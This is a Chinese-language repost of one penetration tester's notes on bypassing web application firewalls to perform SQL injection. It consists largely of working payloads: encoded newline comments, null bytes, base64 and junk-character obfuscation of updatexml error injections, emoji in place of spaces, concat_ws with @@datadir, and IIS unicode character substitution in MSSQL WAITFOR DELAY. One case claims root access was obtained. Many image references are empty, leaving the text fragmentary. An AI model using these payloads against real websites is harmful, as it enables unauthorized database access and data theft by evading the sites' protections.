这篇文章搜集整理自@Junehck师傅的Github,记录了他在实战中遇到的各种WAF拦截SQL注入的场景和绕过姿势,文章并不是完整的,仅记录了Bypass部分。
https://github.com/Junehck/SQL-injection-bypass
data:image/s3,"s3://crabby-images/ffa18/ffa186b4acd415dda36caaf3f56eee95ee8ab91c" alt=""
data:image/s3,"s3://crabby-images/96615/96615715bebb86ef214520ac1abb3bc8df9eb71c" alt=""
')
闭合keywords=1') %23
data:image/s3,"s3://crabby-images/8970e/8970e7ab4d24e5bc6d8125cd8e4d69431c5c0bfd" alt=""
--%0a
代替空格即可data:image/s3,"s3://crabby-images/df56f/df56fa38de57ab55cebd3111ae94f53412055b07" alt=""
union select
会一直卡着,没有任何返回data:image/s3,"s3://crabby-images/ef25f/ef25f3936fce7f3b305d447d1a607e0ef00c4ada" alt=""
--%0a
,成功响应,在 select 跟 1,2,3… 之间用两个 –%0a 会无响应data:image/s3,"s3://crabby-images/fe73f/fe73f52598137e88ec87f3ae0e660d7fb4982c97" alt=""
%00
并 url 编码,原理是 waf 把空字节认为是结束导致了后面的语句可以绕过data:image/s3,"s3://crabby-images/01b83/01b83b08653c7f443d74c49f5a69b7f5cf740bbd" alt=""
data:image/s3,"s3://crabby-images/4d53a/4d53ac12da21e4d91d550a7fc396dda1080638d6" alt=""
data:image/s3,"s3://crabby-images/0fa2f/0fa2f3a019f4372c6401eb310d40f35a58f35375" alt=""
133 and updatexml(1,concat(0x1,user()),1)
MTMzIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHgxLHVzZXIoKSksMSk=
data:image/s3,"s3://crabby-images/b3fb8/b3fb8baec4c64327beaddc531f1ac3b4ff881ea7" alt=""
!、@、.
来让 waf 没办法识别到,但是后端可以识别,成功注入得到 root 权限M!T!@MzIGF.@uZ!CB.1c.GR@.h.dGV.4b.@Ww.!oM!!Sxjb@25jYX.Qo@M.Hg.@x.LH.V@.zZXI!oKSksM!S!.k.=
data:image/s3,"s3://crabby-images/82127/821274f6a3f53547000148f7d6dfc7bd6c8247d8" alt=""
data:image/s3,"s3://crabby-images/b00ca/b00ca9581c961d13bbd746834676a8d989688d1a" alt=""
data:image/s3,"s3://crabby-images/6185a/6185a85e0d9fc79872ac26e38536b2bc95147352" alt=""
emoji
方式去代替空格来绕过 waf,成功注入出回显data:image/s3,"s3://crabby-images/2ab54/2ab547f3da8be9adba4df08a128aace55f574f99" alt=""
data:image/s3,"s3://crabby-images/f188e/f188e02f76dbc498e2afa289906381473f692273" alt=""
"伪注释"
,这里我们构造http://xxxx/xxxx.asp?a=/&id=1308%20order%20by%2035&b=/ order by 35 正常
data:image/s3,"s3://crabby-images/cb3dd/cb3dd09fe39980cd5d4b85bb88022b820d8fe8ed" alt=""
data:image/s3,"s3://crabby-images/85f2b/85f2bdcdc36488b4f88ec45350e423222e11e683" alt=""
data:image/s3,"s3://crabby-images/2af91/2af910ad11973c26bca35ee7d9492d35eba97c4c" alt=""
updatexml
这种关键字直接拦截data:image/s3,"s3://crabby-images/2daf6/2daf6dc503dbd636439ea26d1b0d0312ba85014d" alt=""
脏数据
来绕过大量数据&searchText='or updatexml(1,concat(0x1,user()),1) and '1'='1
data:image/s3,"s3://crabby-images/c5dee/c5dee4f017cbb081f56c0692bc805e61625f88eb" alt=""
data:image/s3,"s3://crabby-images/e613f/e613fb3594c2a49ddc008230dfc115f5fb13d6dd" alt=""
data:image/s3,"s3://crabby-images/baeeb/baeeba54f1616012665c00f90fef94d099986924" alt=""
and (+-/^)
发现并没有被拦截keywords=11'and-updatexml()
data:image/s3,"s3://crabby-images/7ec2d/7ec2d31bb5e9013bb1f70205cd548612c40b0398" alt=""
Updatexml
参数为数字时被拦截keywords=11'and-updatexml(1,1,1)
data:image/s3,"s3://crabby-images/29f94/29f94fae5e568b8b8fc0bd7cc48f2b73b88e1ba8" alt=""
16
进制或者科学计数法0x1
或1e1
keywords=11'and-updatexml(0x1,,0x1)
data:image/s3,"s3://crabby-images/9f3aa/9f3aa0e5e53ebee6775bf293a89a9fd8acfcb18a" alt=""
and'
让他配合原有的单引号把%包裹起来keywords=11'and-updatexml(0x1,,0x1)and'
concat
函数被拦截,这里使用 concat_ws()
函数,将后面的参数用第一个值来分割,然后配合@@datadir
输出路径11'and-updatexml(0x1,concat_ws(1,0x7e,@@datadir),0x1)and'
data:image/s3,"s3://crabby-images/40e42/40e429ac43a88eb36cda713bcc6729be92be92ec" alt=""
-1 /1/0
运算判断出存在数字型 sql 注入,一般来说 asp 都是用 access,这里使用--%0a
的方式来构造 payload 也能正常执行,判断出这里为 mssql--随机字符%0a AND--随机字符%0a1=1
data:image/s3,"s3://crabby-images/59076/590764760deadf153bf7a79d74563462d486dafc" alt=""
unicode
在 iis 解析之后会被转换成 multibyte,但是转换的过程中可能出现:多个 widechar会有可能转换为同一个字符打个比方就是譬如 select 中的
e
对应的 unicode 为%u0065
,但是%u00f0
同样会被转换成为e
o --> %u004f --> %u006f --> %u00ba
e --> %u0045 --> %u0065 --> %u00f0
o
替换为%u00ba
,返回时间正常WAITF%u00baR%20DELAY%20%270:0:0%27
data:image/s3,"s3://crabby-images/401a9/401a97857647e05f920bb1603c7c510a09ef51be" alt=""
data:image/s3,"s3://crabby-images/78f38/78f38faad2fa1fe811b016f54bbe487f95d4bacb" alt=""
data:image/s3,"s3://crabby-images/69711/69711a39bb59db9bc16a0bc1d9a68d53f5b7e97c" alt=""
data:image/s3,"s3://crabby-images/0aac0/0aac0f261c07fa58b257ba024eb276243e4cbb60" alt=""
好文推荐
data:image/s3,"s3://crabby-images/2b2cb/2b2cb0a9e7c0c5aa420884e9356c83fd231341d3" alt=""